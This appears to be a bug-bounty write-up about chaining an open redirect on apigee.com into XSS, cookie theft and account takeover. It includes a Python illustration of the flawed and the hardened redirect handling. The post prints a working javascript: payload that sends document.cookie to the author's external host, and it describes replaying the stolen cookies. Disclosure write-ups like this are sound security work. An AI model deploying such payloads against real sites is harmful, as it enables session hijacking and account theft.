Account takeover on a Google acquisition, apigee.com


Hi guys..
So back in the summer I decided to get a HoF (Hall of Fame entry) from Google, because it was one of my most wanted dreams. So I started searching for new Google stuff, then heard about Google acquisitions and thought I'd try my luck on one of the Google acquisitions, apigee.com.
First let me tell you about Google acquisitions. Actually, I am not going to explain it here; if you want to know about it, visit this.
Back to the topic!!
So after doing some recon I moved on to manual testing, and almost 10 minutes later I discovered an open redirect. The bad thing was that Google doesn't accept open redirects, and I was like...

Then I tried XSS with the payload javascript:alert(1) and it worked. I was so happy, and I thought of reporting it as a high-impact issue, so I quickly started searching for what can be done with an XSS and found a blog post about stealing a user's cookies through XSS. I tried it, but it didn't work for me because of a wrong payload entry, so I decided to first study the payload and then make one that would match my situation. The payload I made was:
javascript:document.location="https://silverpoision.000webhostapp.com/stealer.php%3Fcookie%3D"%20%2B%20document.cookie
This simple payload sends the victim's cookies to my server, which stores them in log.txt.
(If anyone wants the source code, ping me on Fb or Twitter.)
At that point it struck me to turn this into an account takeover. So I started searching for account takeovers and read a PoC much like my situation, but a bit different: in that PoC there was no open redirect, just an XSS, then cookie stealing and account takeover by replaying the cookies.
So I thought, what's wrong with me? I can do this too, and after replaying the cookies it logged me into my account.
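As an added illustration (not code from this post, from Apigee or from Google), here is the redirect handling that makes this chain possible beside a hardened version that rejects the javascript: URI, scheme-relative URLs and foreign hosts, plus a check for the HttpOnly flag whose absence is what lets document.cookie read the session cookie in the second step. ALLOWED_HOSTS, the attacker.example host and the decoded sample payload are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list of hosts the application may redirect to (assumed; not from the post).
ALLOWED_HOSTS = {"apigee.com", "www.apigee.com"}

# Constructed sample input modelled on the post's payload, already URL-decoded the way a web
# framework hands a query parameter to the application; attacker.example is a placeholder host.
XSS_PAYLOAD = ('javascript:document.location="https://attacker.example/stealer.php?cookie="'
               ' + document.cookie')


def vulnerable_redirect_target(next_param: str) -> str:
    """'Before': the redirect parameter is trusted as-is, so a javascript: URI ends up in a
    Location header or an <a href>, which is exactly the XSS sink used in the post."""
    return next_param


def safe_redirect_target(next_param: str, fallback: str = "/") -> str:
    """'After': only http(s) URLs on allow-listed hosts or absolute local paths survive;
    anything else (javascript:, data:, foreign hosts, scheme-relative URLs) gets the fallback."""
    raw = next_param.strip()
    if any(ord(ch) < 0x20 for ch in raw):          # tabs/newlines are classic scheme-smuggling tricks
        return fallback
    parts = urlsplit(raw)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return fallback                             # javascript:, data:, vbscript:, ...
    if parts.netloc:                                # absolute or scheme-relative ("//host") URL
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return fallback                         # the open redirect itself
        return raw
    # No host: must be a plain absolute path. Browsers treat "/\" like "//", so reject it too.
    if not raw.startswith("/") or raw.startswith("//") or raw.startswith("/\\"):
        return fallback
    return raw


def cookie_readable_by_script(set_cookie: str) -> bool:
    """Step 2 of the chain (document.cookie) only works when the session cookie lacks HttpOnly.
    Returns True if this Set-Cookie header value leaves the cookie readable by page script."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie.split(";")[1:]}
    return "httponly" not in attrs
```

The hardened validator stops the first link of the chain; HttpOnly on the session cookie breaks the second link even if an XSS slips through elsewhere.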
My reaction was like........



Reported it to Google at the same moment.
Lesson learned:
Try to exploit a vulnerability and show its impact instead of just reporting it.

Video PoC


Timeline:-
Reported                 28/06/2017
Report triaged           29/06/2017 (same day: "Nice catch...", got HoF)
Marked as duplicate      20/07/2017

After that I reported some more vulnerabilities to Google, and fixes are in progress.
I will also disclose my Microsoft PoC here soon..
Sorry for my bad English xD
Thanks for reading
Hope you enjoyed it, guys..

